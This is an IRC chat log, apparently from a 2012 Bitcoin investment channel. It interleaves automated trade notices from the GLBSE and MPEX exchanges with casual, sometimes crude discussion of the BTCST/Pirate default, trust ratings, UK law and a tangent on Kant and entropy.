05:37:10 i'd short it if the global scam exchange had shorting. Sep 02 05:37:53 dmc holds abmo, btc-mining, and btcmc Sep 02 05:38:07 and dmc will also soon be profiting from the hosting sales Sep 02 05:38:16 woohoo Sep 02 05:38:32 yea, srsly, who wants to go into a 3 month swap with me ? your 10k asiminer shares for my 1k btc Sep 02 05:39:04 [GLBSE] [GSDPT] 164 @ 0.0033996 = 0.5575 BTC [-] Sep 02 05:39:21 Obsi: how many asicminer shares you have now Sep 02 05:39:26 [GLBSE] [GSDPT] 280 @ 0.0033997 = 0.9519 BTC [+] Sep 02 05:39:31 5000 even I think Sep 02 05:39:35 nice. Sep 02 05:39:37 !ticker nasty Sep 02 05:39:39 [GLBSE:NASTY] [Bid: 0.55] [Ask: 0.6] [Spread: 0.05] [Last: 0.5] [24hVol: 1] [7dAvg: 0.53412978] Sep 02 05:39:48 ;;gettrust obsi Sep 02 05:39:49 Trust relationship from user mircea_popescu to user obsi: Level 1: 0, Level 2: 1 via 1 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=obsi Sep 02 05:40:19 BTC-Mining: whens your next dividend Sep 02 05:42:44 [GLBSE] [GSDPT] 400 @ 0.0033997 = 1.3599 BTC [+] Sep 02 05:46:19 [GLBSE] [COGNITIVE] 1 @ 0.6487 BTC [+] Sep 02 05:47:29 when's the vandroiy bet run out, anyone remember ? Sep 02 05:48:28 yesterday maybe Sep 02 05:48:33 A default will be construed to have occurred, if at any time prior to October 1 2013, 00.01 UTC, BTCST will be late by at least 14 calendar days, in disbursing either any regularly-scheduled interest payment, or any withdrawal request, by a valid account holder of BTCST. Sep 02 05:48:36 [GLBSE] [COGNITIVE] 2 @ 0.6487 = 1.2974 BTC [+] Sep 02 05:48:42 right, this is actually... done. Sep 02 05:49:00 it expired end of august. Sep 02 05:49:25 Is Nefario alright? Sep 02 05:49:32 He hasn't been on for awhile. Sep 02 05:49:53 Diablo-D3 soon, when Amazingrando pays Sep 02 05:50:06 BTC-Mining: oh, today? I was asking in general Sep 02 05:50:09 didnt know it was that close Sep 02 05:50:16 should be tomorrow or monday Sep 02 05:50:24 That's when he usually sends out Sep 02 05:50:44 [MPEX] [S.MPOE] 26071 @ 0.00039323 = 10.2519 BTC [-] Sep 02 05:50:45 Bane_Capital you still waiting on that ipo ? Sep 02 05:50:46 [MPEX] [S.MPOE] 16529 @ 0.00039206 = 6.4804 BTC [-] Sep 02 05:51:02 micrea_popescu: Waiting on the refund. Sep 02 05:51:08 Unless he sent it and I missed it. Sep 02 05:51:22 Which if he did, he's going to be pissed at me for whatever reason. Sep 02 05:51:35 Short-fuse on that guy. Sep 02 05:53:35 BTC-Mining: maybe this time I can afford weekly btc-mining shares Sep 02 05:53:44 Anyways, if he doesn't refund, I'll just take my business to MPeX for good. Sep 02 05:54:01 Bane_Capital: refund on what? Sep 02 05:54:14 My rejected IPO when he changed standards. Sep 02 05:54:24 did you check your BTC balance? Sep 02 05:54:34 Yes, yes I have. Sep 02 05:54:41 when did he reject it? Sep 02 05:54:57 because hes out of the country visiting his family in china, and he doesnt have constant internet access Sep 02 05:54:58 It was a startup fund and not a existing company. Sep 02 05:55:03 Oh Sep 02 05:55:06 According to nanotube, pirate conceded the bet in private conversation. Sep 02 05:55:06 That explains it. Sep 02 05:55:12 o wow, the bet was in fact paid out. Sep 02 05:55:25 Bane_Capital: yeah, so give him a bit Sep 02 05:55:32 Well, Matthew, might win. Sep 02 05:56:29 well, vandroiy bet is the end of discussion. it's a complete, definitive, unmitigated and irrecoverable default, there's no money, forgeddaboutit. Sep 02 05:56:41 ooo Sep 02 05:56:44 I spoke too soon. Sep 02 05:56:55 well Sep 02 05:56:59 unless pirate paysit Sep 02 05:57:02 or has it been 2 weeks? Sep 02 05:57:21 I really thought Vandroiy was screwed. Sep 02 05:57:26 Man, I admire that guy now. Sep 02 05:57:39 He must have a good head on his shoulders. Sep 02 05:57:47 yeah, he did a good thing Sep 02 05:57:49 he accepted what he thinks is stolen funds Sep 02 05:57:55 ;;gettrust vandroiy Sep 02 05:57:56 Trust relationship from user mircea_popescu to user vandroiy: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=vandroiy Sep 02 05:58:12 Chaang-Noi: Who did? : O Sep 02 05:58:18 van Sep 02 05:58:28 Heh, it gets sketchier and sketchier Sep 02 05:58:32 Chaaang-Noi did you ? Sep 02 05:58:58 How much was the bet again? Sep 02 05:59:04 how could i take stlen funds, lol also see that word think/? loo it up Sep 02 05:59:05 100,000 dollars Sep 02 05:59:07 look Sep 02 05:59:07 10k BTC Sep 02 05:59:14 5k each right? Sep 02 05:59:20 Yep Sep 02 05:59:20 yes Sep 02 05:59:33 So a 5k profit. Has he been paid out now? Sep 02 05:59:59 The stockholm syndrome on #BTCST is fascinating Sep 02 06:00:07 Chaaang-Noi you got people to throw their money away at a scam. he helped the community to come to its senses. you're the one in offsaid here, not him. Sep 02 06:00:40 ;;rate vandroiy 1 Risked 5k of his own bitcoins to help a bunch of forum retards see the light. Sep 02 06:00:42 Rating entry successful. Your rating of 1 for user vandroiy has been recorded. Sep 02 06:00:53 mircea_popescu: heh, what I dont get is Sep 02 06:00:56 why did people invest in it Sep 02 06:01:12 because of people like Chaaang-Noi. and gigavps. and etc. stupidly vouching for it. Sep 02 06:01:14 the fact is he accepted 5k btc that he thinks is stolen Sep 02 06:01:24 mircea_popescu: yeah, but my word outweighs theirs Sep 02 06:01:32 and I said it was not trustworthy because pirate wont admit what hes doing Sep 02 06:01:33 not after that dmc fiasco, no. Sep 02 06:01:37 People who invested in Pirate should be completely open to losing it all. Sep 02 06:01:38 [GLBSE] [GMVT-BOT] 1 @ 0.14 BTC [+] Sep 02 06:01:47 there is no dmc fiasco Sep 02 06:01:53 its quite nutty to even claim there is Sep 02 06:02:11 wellll then there's no explanation. Sep 02 06:02:24 yeah, there isnt one, its nuts =/ Sep 02 06:02:34 I think Pirate is going to just disappear soon. Sep 02 06:02:39 It's looking that way. Sep 02 06:02:42 pirate is going to be like bitcoinica Sep 02 06:03:09 I mean, if I were Pirate, I would just say all investments have risks. I am sorry. Then disconnect. Sep 02 06:03:50 I can only imagine him being totally screwed. Sep 02 06:05:42 yeah Sep 02 06:07:22 [GLBSE] [OBSI.HRPT] 1 @ 0.103589 BTC [-] Sep 02 06:12:23 https://bitcointalk.org/index.php?topic=102176.msg1153548#msg1153548 Sep 02 06:12:51 wd! Sep 02 06:13:02 ty :> Sep 02 06:14:05 ;;ticker Sep 02 06:14:05 Best bid: 9.82, Best ask: 9.88, Bid-ask spread: 0.06000, Last trade: 9.88, 24 hour volume: 20084, 24 hour low: 9.77635, 24 hour high: 10.1 Sep 02 06:19:27 [MPEX] [F.GIGA.ETF] 7823 @ 0.00090794 = 7.1028 BTC [+] Sep 02 06:20:08 https://bitcointalk.org/index.php?topic=105380.msg1153561#new Sep 02 06:20:11 lolololol Sep 02 06:20:45 [GLBSE] [FUTUREFUND] 1000 @ 0.000121 = 0.121 BTC [+] Sep 02 06:27:02 [MPEX] [S.MPOE] 22421 @ 0.00039292 = 8.8097 BTC [+] Sep 02 06:27:03 [MPEX] [S.MPOE] 30592 @ 0.00039206 = 11.9939 BTC [-] Sep 02 06:27:05 [MPEX] [S.MPOE] 5287 @ 0.00039164 = 2.0706 BTC [-] Sep 02 06:36:41 Sounds about right, Bane_Capital Sep 02 06:47:06 [MPEX] [S.MPOE] 21293 @ 0.00039294 = 8.3669 BTC [+] Sep 02 06:51:03 [GLBSE] [TYGRR.BOND-P] 1 @ 0.15151515 BTC [-] Sep 02 06:51:05 [GLBSE] [TYGRR.BOND-P] 1 @ 0.15 BTC [-] Sep 02 06:51:07 [GLBSE] [TYGRR.BOND-P] 1 @ 0.14141414 BTC [-] Sep 02 06:51:08 [GLBSE] [TYGRR.BOND-P] 1 @ 0.14 BTC [-] Sep 02 06:51:08 [GLBSE] [TYGRR.BOND-P] 1 @ 0.13131313 BTC [-] Sep 02 06:51:09 [GLBSE] [TYGRR.BOND-P] 1 @ 0.13 BTC [-] Sep 02 06:51:10 [GLBSE] [TYGRR.BOND-P] 1 @ 0.12121212 BTC [-] Sep 02 06:51:11 [GLBSE] [TYGRR.BOND-P] 1 @ 0.12 BTC [-] Sep 02 06:51:12 [GLBSE] [TYGRR.BOND-P] 1 @ 0.11111111 BTC [-] Sep 02 06:51:13 [GLBSE] [TYGRR.BOND-P] 1 @ 0.11 BTC [-] Sep 02 06:51:44 Pirate bonds going down again Sep 02 06:53:57 [GLBSE] [PUREMINING] 7 @ 0.0931 = 0.6517 BTC [-] Sep 02 06:54:25 [GLBSE] [PUREMINING] 6 @ 0.09346 = 0.5608 BTC [+] Sep 02 06:54:27 lawl at mkt depth Sep 02 06:54:36 Should be valuated 0.001 as a memento: "I have defaulted on shares of the famous BS&T!" Sep 02 06:54:38 srsly, 5 sales go -40% ? Sep 02 06:55:02 I have no idea who puts up those bids Sep 02 06:55:11 but yeah Sep 02 06:55:20 They were selling around .10 Sep 02 06:56:08 [MPEX] [S.MPOE] 1000 @ 0.00039164 = 0.3916 BTC [-] Sep 02 06:56:09 [GLBSE] [COGNITIVE] 4 @ 0.6487 = 2.5948 BTC [+] Sep 02 06:56:26 https://bitcointalk.org/index.php?topic=81542.0 Sep 02 06:56:42 [GLBSE] [COGNITIVE] 1 @ 0.6597 BTC [+] Sep 02 06:56:54 I'm now rated + included in the list of deposit takes and fixed interest bonds. Sep 02 06:58:12 [GLBSE] [JAH] 3 @ 0.15 = 0.45 BTC [-] Sep 02 06:58:41 lmao there's nobody in that list wtf.\ Sep 02 06:59:06 I like how Patrick gets a monopoly on the rating business. Sep 02 06:59:26 how the fuck is kludge AAA Sep 02 06:59:34 wasn't he the guy that financed that failed kronos thing ? Sep 02 06:59:43 Bane_Capital i don't see who takes the forum crud seriously. Sep 02 06:59:58 Yeah, it's amateur hour. Sep 02 07:00:17 Patrick just made himself god by loaning out huge sums. Sep 02 07:00:33 basically, it's installment #52 of "i've met some douches on a social media site we are AAAA++++ nao" Sep 02 07:00:34 It will be different a year from now. Sep 02 07:00:36 circlejerk bs. Sep 02 07:01:06 The professional people that come in in the future are going to shit all over this self-important drivel. Sep 02 07:02:46 [GLBSE] [BTC-MINING] 1 @ 0.96999 BTC [+] Sep 02 07:06:28 Bane_Capital they currently are. Sep 02 07:06:37 : ) Sep 02 07:08:20 [MPEX] [S.DICE] 4350 @ 0.0034 = 14.79 BTC [+] Sep 02 07:08:58 [MPEX] [O.BTCUSD.C090T] 100 @ 0.24844567 = 24.8446 BTC [+] Sep 02 07:09:50 [GLBSE] [PUREMINING] 1 @ 0.0935 BTC [+] **** BEGIN LOGGING AT Sun Sep 2 14:45:11 2012 Sep 02 14:45:44 [GLBSE] [NASTY] 1 @ 0.56 BTC [-] Sep 02 14:51:56 [MPEX] [S.MPOE] 4100 @ 0.000389 = 1.5949 BTC [-] Sep 02 14:54:57 [GLBSE] [HYDRO.BONDS] 1 @ 1.59889 BTC [+] Sep 02 14:55:51 nyan.c paid 4.29% and increased NAV: https://bitcointalk.org/index.php?topic=97178.msg1154283#msg1154283 Sep 02 14:56:06 [GLBSE] [FPGAMINING] 3 @ 0.77 = 2.31 BTC [-] Sep 02 15:02:55 wd usagi. Sep 02 15:03:11 does that clear any pirate exposure from your holdings there ? Sep 02 15:03:47 [GLBSE] [BITCOINRS] 26 @ 0.050999 = 1.326 BTC [+] Sep 02 15:04:41 [GLBSE] [BITCOINRS] 10 @ 0.05099999 = 0.51 BTC [+] Sep 02 15:08:07 mornin Sep 02 15:12:54 [GLBSE] [NYAN] 7 @ 1 = 7 BTC [-] Sep 02 15:13:08 [GLBSE] [FPGAMINING] 2 @ 0.77 = 1.54 BTC [-] Sep 02 15:14:34 back Sep 02 15:14:37 what did I miss Sep 02 15:14:43 [06:42:08] << wtf Diablo-D3, ASICMINER isn`t even mining yet lol Sep 02 15:14:51 PsychoticBoy: Im judging it on future earnings Sep 02 15:14:53 [GLBSE] [TYGRR.BOND-P] 1 @ 0.12 BTC [-] Sep 02 15:15:19 [GLBSE] [YARR] 8 @ 1 = 8 BTC [+] Sep 02 15:17:11 [GLBSE] [FPGAMINING] 25 @ 0.7777 = 19.4425 BTC [+] Sep 02 15:17:24 usagi: pm Sep 02 15:18:20 [GLBSE] [MU] 1 @ 0.4011 BTC [+] Sep 02 15:18:22 [GLBSE] [MU] 10 @ 0.401 = 4.01 BTC [-] Sep 02 15:20:02 [GLBSE] [NYAN.B] 1 @ 1 BTC [-] Sep 02 15:20:39 [GLBSE] [FDBF] 6 @ 0.1499999 = 0.9 BTC [+] Sep 02 15:21:16 Almost Sep 02 15:21:53 It marginalizes them Sep 02 15:22:11 [07:08:26] pm theymos ;) Sep 02 15:22:20 I dont think pming theymos will do anything. I am a forum mod. Sep 02 15:23:15 i don't understand anyone still living in the uk. Sep 02 15:23:26 mircea_popescu: neither do I Sep 02 15:23:31 you have to give out your password or spend two years in prison even without any actual wrongdoing ? Sep 02 15:23:39 I think its time we just nuke the place Sep 02 15:23:41 get the fuck out ?! how can people still be there ?! Sep 02 15:24:22 i would say no business located in the uk can be considered for bitcoin stuff, nor any individual located there can run a bitcoin business. Sep 02 15:24:38 yeah, the UK needs to be shut off from the Internet Sep 02 15:25:00 at any rate from the internet that matters. Sep 02 15:26:03 [GLBSE] [FDBF] 1 @ 0.1499999 BTC [+] Sep 02 15:26:06 [GLBSE] [FDBF] 20 @ 0.1499999 = 3 BTC [+] Sep 02 15:28:40 heh so ten bitcoin withdrawn a thousand deposited. goood morning Sep 02 15:28:42 [GLBSE] [OBSI.HRPT] 3 @ 0.10349 = 0.3105 BTC [-] Sep 02 15:29:04 [GLBSE] [FDBF] 5 @ 0.1499999 = 0.75 BTC [+] Sep 02 15:29:38 ;;ticker Sep 02 15:29:39 Best bid: 9.80002, Best ask: 9.87889, Bid-ask spread: 0.07887, Last trade: 9.88889, 24 hour volume: 16067, 24 hour low: 9.71922, 24 hour high: 10.09466 Sep 02 15:30:59 [07:08:26] pm theymos ;) Sep 02 15:30:59 I dont think pming theymos will do anything. I am a forum mod. was sarcastic, and i dont think you read what i sayd before Sep 02 15:31:19 PsychoticBoy: meh Sep 02 15:31:29 eskimobob and p4man are nutjobs either way Sep 02 15:34:51 lmao this is hysterical. Sep 02 15:35:00 so there's this shill account in the wot, Sep 02 15:35:05 psykick. Sep 02 15:35:12 it gets a 1 from some user, then he rates pirate 10. Sep 02 15:35:20 that user (jcpham) takes his rating away yest. Sep 02 15:35:22 meanwhile... Sep 02 15:35:23 14281 gigavps 257 psykick 2012-09-02 02:36:35 1 traded coins for paypal Sep 02 15:35:31 mircea_popescu: btw, eskimobob called you out for trolling the dmc thread Sep 02 15:36:00 eskimobob is calling people out for trolling nao ?! Sep 02 15:37:47 I know, rite Sep 02 15:38:25 this is sorta like crypto-melroseplace Sep 02 15:38:35 everyone does everything. Sep 02 15:38:37 90210 Sep 02 15:38:50 no cause at least in that the chicks were hawt. Sep 02 15:39:01 what was that fat brunette called... amber or something Sep 02 15:39:23 never saw either of those Sep 02 15:39:45 well so watch the forum then. Sep 02 15:41:58 [GLBSE] [DMC] 1 @ 0.07999 BTC [-] Sep 02 15:42:24 [MPEX] [O.BTCUSD.C100T] 830 @ 0.18800017 = 156.0401 BTC [-] Sep 02 15:43:57 [GLBSE] [DMC] 176 @ 0.07999999 = 14.08 BTC [+] Sep 02 15:44:30 [MPEX] [S.DICE] 83000 @ 0.00335 = 278.05 BTC [-] Sep 02 15:44:42 [GLBSE] [ASICMINER] 7 @ 0.1169 = 0.8183 BTC [-] Sep 02 15:51:22 [GLBSE] [FDBF] 10 @ 0.1499999 = 1.5 BTC [+] Sep 02 15:52:24 [MPEX] [S.DICE] 142500 @ 0.00335 = 477.375 BTC [-] Sep 02 15:52:59 [GLBSE] [ASICMINER] 4 @ 0.117 = 0.468 BTC [+] Sep 02 15:55:40 [GLBSE] [JTME] 10 @ 0.94479 = 9.4479 BTC [-] Sep 02 15:57:00 [GLBSE] [FDBF] 34 @ 0.1499999 = 5.1 BTC [+] Sep 02 15:57:22 [GLBSE] [FDBF] 10 @ 0.1499999 = 1.5 BTC [+] Sep 02 15:58:03 [MPEX] [S.MPOE] 242 @ 0.00039224 = 0.0949 BTC [+] Sep 02 16:00:03 [GLBSE] [GSDPT] 340 @ 0.0032 = 1.088 BTC [-] Sep 02 16:00:13 [GLBSE] [OBSI.HRPT] 5 @ 0.10349 = 0.5175 BTC [-] Sep 02 16:00:53 [GLBSE] [TEEK.B] 1 @ 0.91 BTC [-] Sep 02 16:01:03 [GLBSE] [YARR] 25 @ 1 = 25 BTC [+] Sep 02 16:01:56 [GLBSE] [BBBB] 300 @ 0.00024 = 0.072 BTC [+] Sep 02 16:06:26 [GLBSE] [CPA] 1 @ 0.08 BTC [-] Sep 02 16:07:43 [MPEX] [S.DICE] 74500 @ 0.00335 = 249.575 BTC [-] Sep 02 16:07:44 [MPEX] [S.DICE] 500 @ 0.0033 = 1.65 BTC [-] Sep 02 16:07:47 mircea_popescu: what is the meaning of the number before the unix timestamp in STAT output? Sep 02 16:07:59 ^^ Sep 02 16:08:05 its microtime. Sep 02 16:08:11 (i had trouble with that as well) Sep 02 16:08:30 microtime? Sep 02 16:08:42 just ignore it Sep 02 16:08:42 you mean, sub-second timestamp? Sep 02 16:09:20 [GLBSE] [NYAN.A] 3 @ 1 = 3 BTC [+] Sep 02 16:10:04 not sure why is it there Sep 02 16:11:40 [GLBSE] [ASICMINER] 6 @ 0.117 = 0.702 BTC [+] Sep 02 16:11:59 ZETA-MINING: dividends for week 35.2012 paid Sep 02 16:12:08 ah, it's the output of a standard PHP function... Sep 02 16:12:28 sgnb its the microtime stamp Sep 02 16:12:51 kakobrekla it's there in case someone comes up with two different stats in the same second (can happen) Sep 02 16:12:58 so you don't end up with sorting conflicts. Sep 02 16:13:04 k Sep 02 16:14:27 ;;bc,24hprc Sep 02 16:14:29 9.95 Sep 02 16:14:36 o hey trending up ? Sep 02 16:14:37 ;;ticker Sep 02 16:14:38 Best bid: 9.8517, Best ask: 9.9, Bid-ask spread: 0.04830, Last trade: 9.9, 24 hour volume: 15839, 24 hour low: 9.71922, 24 hour high: 10.09466 Sep 02 16:14:50 nop Sep 02 16:15:17 ah and it was so nice when we were back to 15.x Sep 02 16:16:01 heh, i like the fact that i spent ~3.3 btc right at the peak Sep 02 16:22:13 why don't you just use a transaction id to sort instead of timestamps Sep 02 16:27:16 why would i invent my own time now ? we already have a numeric value applied to the flow of entalpy. Sep 02 16:27:32 [GLBSE] [PPT.E] 2 @ 0.32 = 0.64 BTC [-] Sep 02 16:28:38 [GLBSE] [GOLD] 16 @ 0.00989 = 0.1582 BTC [+] Sep 02 16:34:03 ok, mircea_popescu, help me out here. I didn't recognize entalapy, and wikipedia seem sto think it has to do with measuring energy, not time. What am I missing? Sep 02 16:34:13 [GLBSE] [YARR] 16 @ 1 = 16 BTC [+] Sep 02 16:34:15 [GLBSE] [YARR] 84 @ 1 = 84 BTC [+] Sep 02 16:34:41 smickles time only exists in one of two ways. either the kantian (as an implicit category in the mind of man, with no existance in the world) Sep 02 16:35:18 or in the physical. enthalpy is the energy of a system. entropy is the opposite thereof, the locked energy so to speak. all physical processes flow only one way (to greater entropy) and that's the flow of time. Sep 02 16:35:54 so in this approach time is the measure of the flow of energy towards lockdown. Sep 02 16:36:10 hence the notion of the thermic death of the universe, once everything's evened out (sir kelvin's ideea). Sep 02 16:36:33 ah, well, the spine of my 'critique of pure reason' is worn to the point that the pages are falling out.... Sep 02 16:36:59 hehe. got anything for your effort ? Sep 02 16:37:00 [GLBSE] [YARR] 27 @ 1 = 27 BTC [+] Sep 02 16:37:01 [GLBSE] [YARR] 61 @ 1 = 61 BTC [+] Sep 02 16:37:02 [GLBSE] [YARR] 11 @ 1 = 11 BTC [+] Sep 02 16:37:03 [GLBSE] [YARR] 1 @ 1 BTC [+] Sep 02 16:38:13 i probably vaguely understand kant's idea of time and space Sep 02 16:38:59 well, puts you ahead of most people :p Sep 02 16:40:15 also, i recall something about 'antithetic' reason, or some such Sep 02 16:40:23 in a practical sense Sep 02 16:40:48 the book is probably just a good model on how to thoroughly explain something Sep 02 16:41:00 that;'s true. Sep 02 16:42:35 [GLBSE] [GSDPT] 5200 @ 0.0032 = 16.64 BTC [-] Sep 02 16:42:36 [GLBSE] [GSDPT] 19320 @ 0.0033997 = 65.6822 BTC [+] Sep 02 16:42:37 [GLBSE] [GSDPT] 480 @ 0.0034 = 1.632 BTC [+] Sep 02 16:42:56 [MPEX] [S.MPOE] 32658 @ 0.00039224 = 12.8098 BTC [+] Sep 02 16:42:57 [MPEX] [S.MPOE] 3942 @ 0.00039249 = 1.5472 BTC [+] Sep 02 16:43:51 [GLBSE] [FDBF] 2 @ 0.1499999 = 0.3 BTC [+] Sep 02 16:44:16 [GLBSE] [OBSI.HRPT] 1 @ 0.10348 BTC [-] Sep 02 16:44:59 [GLBSE] [MU] 2 @ 0.365 = 0.73 BTC [-] Sep 02 16:45:12 [GLBSE] [NYAN.C] 32 @ 0.79 = 25.28 BTC [+] Sep 02 16:45:33 [GLBSE] [FDBF] 4 @ 0.1499999 = 0.6 BTC [+] Sep 02 16:46:03 [GLBSE] [GIGAMINING] 5 @ 0.8497 = 4.2485 BTC [+] Sep 02 16:47:12 !pl NYAN.C 0.79 Sep 02 16:47:12 Requesting data from GLBSE (might take a while). Sep 02 16:47:13 NYAN.C [1@0.79BTC] paid: 0.13580463 BTC. Last price: 0.79 BTC. Capital gain: 0 BTC. Total: 0.13580463 BTC. (17.2%) Sep 02 16:48:08 [GLBSE] [V.HRL] 5 @ 1 = 5 BTC Sep 02 16:48:42 [GLBSE] [M.ETF] 1 @ 0.12 BTC [+] Sep 02 16:48:46 [GLBSE] [NYAN.C] 1 @ 0.94 BTC [+] Sep 02 16:50:29 [GLBSE] [FPGA.CONTRACT] 3 @ 0.079999 = 0.24 BTC [-] Sep 02 16:51:24 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.24652475 = 246.5248 BTC [-] Sep 02 16:51:59 [MPEX] [O.BTCUSD.P200T] 714 @ 1.26223009 = 901.2323 BTC [+] Sep 02 16:54:53 !pl NYAN.C 0.94 Sep 02 16:54:53 Requesting data from GLBSE (might take a while). Sep 02 16:54:57 NYAN.C [1@0.94BTC] paid: 0.13580463 BTC. Last price: 0.94 BTC. Capital gain: 0 BTC. Total: 0.13580463 BTC. (14.4%) Sep 02 16:56:01 [GLBSE] [FDBF] 8 @ 0.1499999 = 1.2 BTC [+] Sep 02 16:56:25 [GLBSE] [OBSI.HRPT] 1 @ 0.10348 BTC [-] Sep 02 16:57:55 [GLBSE] [FDBF] 3 @ 0.1499999 = 0.45 BTC [+] Sep 02 16:59:40 [GLBSE] [FDBF] 1 @ 0.1499999 BTC [+] Sep 02 17:00:40 wow Sep 02 17:00:45 i just jumped into lightspeed Sep 02 17:01:07 I don't need a message queue at all! Sep 02 17:01:11 doh Sep 02 17:02:43 [MPEX] [S.MPOE] 11760 @ 0.00039249 = 4.6157 BTC [+] Sep 02 17:05:03 [GLBSE] [BFLS.RIG] 1 @ 0.9485999 BTC [+] Sep 02 17:11:10 [GLBSE] [OBSI.HRPT] 3 @ 0.10348 = 0.3104 BTC [-] Sep 02 17:11:11 [GLBSE] [OBSI.HRPT] 36 @ 0.10349 = 3.7256 BTC [+] Sep 02 17:13:02 [GLBSE] [GIGAMINING] 6 @ 0.8497 = 5.0982 BTC [+] Sep 02 17:13:04 [GLBSE] [GIGAMINING] 2 @ 0.8498 = 1.6996 BTC [+] Sep 02 17:13:42 [GLBSE] [V.HRL] 1 @ 1 BTC Sep 02 17:13:47 [GLBSE] [GSDPT] 20 @ 0.0034 = 0.068 BTC [+] Sep 02 17:13:52 [GLBSE] [BDT] 3 @ 1.01 = 3.03 BTC [-] Sep 02 17:14:21 [GLBSE] [NYAN.C] 1 @ 0.9 BTC [-] Sep 02 17:15:13 [GLBSE] [OBSI.HRPT] 1 @ 0.10349 BTC [+] Sep 02 17:15:57 [GLBSE] [COGNITIVE] 9 @ 0.6597 = 5.9373 BTC [+] Sep 02 17:17:33 [GLBSE] [TYGRR.BOND-P] 1 @ 0.16 BTC [+] Sep 02 17:17:35 [GLBSE] [TYGRR.BOND-P] 50 @ 0.167 = 8.35 BTC [+] Sep 02 17:17:36 [GLBSE] [TYGRR.BOND-P] 19 @ 0.168 = 3.192 BTC [+] Sep 02 17:17:46 [GLBSE] [KRAKEN] 4 @ 0.01 = 0.04 BTC [+] Sep 02 17:19:43 [GLBSE] [SILVER] 35 @ 0.00902017 = 0.3157 BTC [-] Sep 02 17:38:50 [GLBSE] [BBBB] 25 @ 0.00024 = 0.006 BTC [+] Sep 02 17:48:53 [GLBSE] [NYAN.C] 10 @ 0.79 = 7.9 BTC [-] Sep 02 17:56:11 [GLBSE] [COGNITIVE] 1 @ 0.6598 BTC [+] Sep 02 18:13:57 [GLBSE] [FUTUREFUND] 373 @ 0.000121 = 0.0451 BTC [+] Sep 02 18:14:24 [GLBSE] [FUTUREFUND] 9 @ 0.00012189 = 0.0011 BTC [+] Sep 02 18:16:02 [GLBSE] [NYAN.C] 4 @ 0.66 = 2.64 BTC [-] Sep 02 18:18:47 [GLBSE] [V.HRL] 3 @ 1 = 3 BTC Sep 02 18:19:20 [GLBSE] [FPGAMINING] 3 @ 0.7777 = 2.3331 BTC [+] Sep 02 18:38:37 [GLBSE] [OBSI.HRPT] 6 @ 0.10349 = 0.6209 BTC [+] Sep 02 18:40:04 [GLBSE] [KRAKEN] 3 @ 0.01 = 0.03 BTC [+] Sep 02 18:41:13 [MPEX] [O.BTCUSD.C100T] 260 @ 0.18685622 = 48.5826 BTC [-] Sep 02 18:46:33 [GLBSE] [PUREMINING] 6 @ 0.0934 = 0.5604 BTC [-] Sep 02 18:46:57 [MPEX] [S.MPOE] 17065 @ 0.000389 = 6.6383 BTC [-] Sep 02 18:46:59 [MPEX] [S.MPOE] 1035 @ 0.00038756 = 0.4011 BTC [-] Sep 02 18:56:59 [GLBSE] [CPA] 33 @ 0.06 = 1.98 BTC [-] Sep 02 19:09:19 [GLBSE] [KRAKEN] 10 @ 0.01 = 0.1 BTC [+] Sep 02 19:09:39 [GLBSE] [GIGAMINING] 2 @ 0.8498 = 1.6996 BTC [+] Sep 02 19:20:48 [GLBSE] [ASICMINER] 106 @ 0.117 = 12.402 BTC [+] Sep 02 19:22:38 [GLBSE] [ASICMINER] 25 @ 0.11716498 = 2.9291 BTC [+] Sep 02 19:23:15 [GLBSE] [GMVT-BOT] 1 @ 0.139999 BTC [-] Sep 02 19:26:17 [GLBSE] [OBSI.HRPT] 1 @ 0.10349 BTC [+] Sep 02 19:27:18 [MPEX] [S.MPOE] 1919 @ 0.00038757 = 0.7437 BTC [+] Sep 02 19:27:19 [MPEX] [S.MPOE] 9566 @ 0.00038915 = 3.7226 BTC [+] Sep 02 19:28:23 [GLBSE] [BITBOND] 9 @ 0.4693 = 4.2237 BTC [-] Sep 02 19:28:25 [GLBSE] [BITBOND] 12 @ 0.4694 = 5.6328 BTC [+] Sep 02 19:29:59 [GLBSE] [FPGA.CONTRACT] 1 @ 0.079999 BTC [-] Sep 02 19:30:35 [GLBSE] [FPGA.CONTRACT] 4 @ 0.08 = 0.32 BTC [+] Sep 02 19:31:24 [GLBSE] [NYAN.A] 1 @ 1 BTC [+] Sep 02 19:35:26 [MPEX] [F.GIGA.ETF] 200 @ 0.00091185 = 0.1824 BTC [-] Sep 02 19:35:28 [MPEX] [F.GIGA.ETF] 15939 @ 0.00091799 = 14.6318 BTC [+] Sep 02 19:38:16 [MPEX] [F.GIGA.ETF] 5261 @ 0.00091799 = 4.8295 BTC [+] Sep 02 19:38:17 [MPEX] [F.GIGA.ETF] 439 @ 0.00091859 = 0.4033 BTC [+] Sep 02 19:58:21 [MPEX] [S.MPOE] 41434 @ 0.00038915 = 16.124 BTC [+] Sep 02 19:59:46 [GLBSE] [ASICMINER] 1 @ 0.11110001 BTC [-] Sep 02 19:59:48 [GLBSE] [ASICMINER] 36 @ 0.1111 = 3.9996 BTC [-] Sep 02 19:59:49 [GLBSE] [ASICMINER] 1 @ 0.11100001 BTC [-] Sep 02 19:59:51 [GLBSE] [ASICMINER] 10 @ 0.11100001 = 1.11 BTC [-] Sep 02 19:59:52 [GLBSE] [ASICMINER] 100 @ 0.111 = 11.1 BTC [-] Sep 02 20:01:02 [GLBSE] [ASICMINER] 1 @ 0.11031111 BTC [-] Sep 02 20:01:04 [GLBSE] [ASICMINER] 1 @ 0.11020111 BTC [-] Sep 02 20:01:04 [GLBSE] [ASICMINER] 4 @ 0.1102 = 0.4408 BTC [-] Sep 02 20:02:35 [MPEX] [F.GIGA.ETF] 1715 @ 0.00091859 = 1.5754 BTC [+] Sep 02 20:02:35 [MPEX] [F.GIGA.ETF] 1085 @ 0.00092545 = 1.0041 BTC [+] Sep 02 20:07:52 [GLBSE] [NYAN.C] 39 @ 0.7 = 27.3 BTC [+] Sep 02 20:08:22 [GLBSE] [FPGAMINING] 5 @ 0.7777 = 3.8885 BTC [+] Sep 02 20:11:30 [GLBSE] [FDBF] 10 @ 0.1499999 = 1.5 BTC [+] Sep 02 20:14:53 [MPEX] [S.MPOE] 14337 @ 0.00039007 = 5.5924 BTC [+] Sep 02 20:25:48 !pl BMF 1 Sep 02 20:25:49 Requesting data from GLBSE (might take a while). Sep 02 20:25:55 BMF [1@1BTC] paid: 0.07012769 BTC. Last price: 0.595 BTC. Capital gain: -0.405 BTC. Total: -0.33487231 BTC. (-33.5%) Sep 02 20:28:47 